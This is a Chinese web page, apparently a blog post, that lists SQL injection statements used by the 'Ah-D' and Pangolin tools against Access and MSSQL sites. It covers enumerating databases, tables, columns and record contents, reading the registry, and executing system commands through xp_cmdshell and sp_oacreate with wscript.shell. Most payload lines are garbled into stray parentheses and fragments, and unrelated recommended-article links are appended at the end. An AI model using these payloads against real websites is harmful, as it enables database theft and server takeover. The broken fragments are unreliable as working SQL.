啊D工具语句 适合Access和Mssql注入
啊D注入工具中使用的SQL注入语句
爆user
)) )= | *****
?Id))
: ?Id
: Id
检查SA权限:))))
爆当前库: )) --
检查是否为mssql数据库:and exists (select * from sysobjects)
(*%20from%20sysobjects)
判断表名:
panolin: ?Id
admin也可以编码:%6E
啊D:?Id([admin])
爆列名:
啊D:([admin])
panolin:
判断记录数:
()
判断admin表中有几个记录 如: cstr() 转换成字符型就是"" 那么他的长度就是2,所以这里
阿D: ()) 判断在0-9999之间,这句是判断在0-8之间
(,))))
记录数的第一位 也就是0
(,))))
记录数的第二位 也就是1 所以
猜字段长度:
Article.asp?Id((()) 第一条记录的字段长度
第一条
Article.asp?Id((()) 第二条记录的字段
第二条
阿D:
Article.asp?Id(( 判断第一条记录的字段长度0-32之间
第二条
Article.asp?Id(( 判断第二条记录的字段长度0-32之间
两个top 保留一个top ,改另外一个成top x 就可以猜第x个字段长度 或改最后一个top (pangolin就是改最后一个top来爆第N杀记录的长度)
猜字段内容:
(,)))(()) 第一条记录、第一位的asc码
(,)))(()) 第19位的asc码
阿D:
(,))( 第一条记录、第7位的asc码在30~80之间
第一条
第二条
(,))( 第二条记录、第7位的asc码在30~80之间
猜中文:
(,)))) 第一个列的内容是不是》
(,)))) 第二个列是不是》
检查数据库中有多少个库:)) ))) ) )
爆第一个库: )) ) --
爆第N个库: )) ) --
爆有多少个列名:)))) id )))))))))
爆列名: )) id )))))))) --
读注册表:
))--
) ',@result);--
)) ))) --
执行CMD
),ID ,)) insert D99_CMD exec master.dbo.xp_cmdshell 'dir c:\'--
)))) --
执行WSCRIPT:
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [cmd.exe /c dir c:\] --
恢复XP_CMDSHELL
;exec master..sp_dropextendedproc 'xp_cmdshell'--
啊D工具语句 适合Access和Mssql注入的更多相关文章
- ACCESS与MSSQL比较:SQL语句关于时间格式使用的注意点
ACCESS与MSSQL比较:SQL语句关于时间字符串的使用:ACCESS数据库使用 # 来控制时间格式字符串:mssql数据库使用单引号 ' 来控制时间格式字符串.例: ACCESS版本:UPDAT ...
- Web渗透测试(sql注入 access,mssql,mysql,oracle,)
Access数据库注入: access数据库由微软发布的关系型数据库(小型的),安全性差. access数据库后缀名位*.mdb, asp中连接字符串应用-- "Driver={micros ...
- MSSQL注入常用SQL语句整理
很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,一下是本人收集的一些mssql的sql语句. 手工MSSQL注入常用SQL语句 and exists (select * from ...
- Oracle客户端工具出现“Cannot access NLS data files or invalid environment specified”错误的解决办法
Oracle客户端工具出现"Cannot access NLS data files or invalid environment specified"错误的解决办法 方法一:参考 ...
- (转载)用SQL语句创建Access表
<来源网址:http://www.delphifans.com/infoview/Article_220.html>用SQL语句创建Access表 很久以前弄的,用了一天的时间,没有什么技 ...
- 渗透测试学习 九、 MSsql注入上
MSsql注入漏洞详解 (Asp.Aspx站,常见于棋牌网站.考试网站.大学网站.政府网站.游戏网站.OA办公系统) 大纲:msSQL数据库调用分析 msSQL注入原理 msSQL注入另类玩法 msS ...
- (非原)SQL注入专题--整理帖 && like 语句拼sql 如何防止注入攻击。
原地址:blog.csdn.net/lvjin110/article/details/28697695 like 语句拼sql 如何防止注入攻击?http://bbs.csdn.net/topics/ ...
- MSSQL注入:显错注入及反弹注入
前言: MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路. MSSQL的显错注入操作: 以联合查询为例: 猜 ...
- Access数据库及注入方法
目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数 ...
随机推荐
- PHP调用SQL Server存储过程
一.安装SQL Server Driver for PHP 在微软官网上发现了这个东西,他提供了一套PHP对MS2005/2008操作的全新函数库,并且支持UTF8,作为PHP的扩展运行.看来 ...
- C#获取网上图片的宽高代码
用Visual Studio建立Console应用程序,记得引用程序集System.Drawing; 代码如下: using System;using System.Drawing;using Sys ...
- AJAX编程-封装ajax工具函数
即 Asynchronous [e'sɪŋkrənəs] Javascript And XML,AJAX 不是一门的新的语言,而是对现有技术的综合利用.本质是在HTTP协议的基础上以异步的方式与服务器 ...
- Vue.js简介
Vue.js简介 Vue.js的作者为Evan You(尤雨溪),任职于Google Creative Lab,虽然是Vue是一个个人项目,但在发展前景上个人认为绝不输于Google的AngularJ ...
- System.Data.Dbtype转换为System.Data.SqlDbType
最近在做一些OM Mapping的准备工作,新学了一招. 如果要将System.Data.Dbtype转换为System.Data.SqlDbType,以前以为要写Switch Case语句.其实有很 ...
- Purchase购物车实例分析
源代码下载地址:http://code4app.com/ios/55655def933bf09d328b5141 此源代码从中学到以下四个知识点 第一:关于右边只有一个被选中的效果展现,左边部分代码内 ...
- oc 字符串
#import <Foundation/Foundation.h> int main(int argc, const char * argv[]) { @autoreleasepool { ...
- iOS 中二维码扫描
随着微信的大量推广,越来越多的人会在生活中用到二维码这一个方便大家的功能. 因此,很多的app中也逐渐的都加入了二维码这个元素,今天先给大家介绍一下iOS7后系统自带自己可以手动设计的二维码扫描. Q ...
- 每日Scrum--No.8
Yesterday:学习和编写程序 Today:总结这次的冲刺和以及测试版的初步完成 Problem:在图的设计过程中掌握了图的基本运算函数的算法的理解和程序的有效吸收,包括图的深度和广度优先的遍历, ...
- for循环练习题
■■■■■■■■■■■■■■■■■■■■■■■■■ 代码: <script> for(i=0;i<5;i++) { for(j=0;j<5;j++) { document.wr ...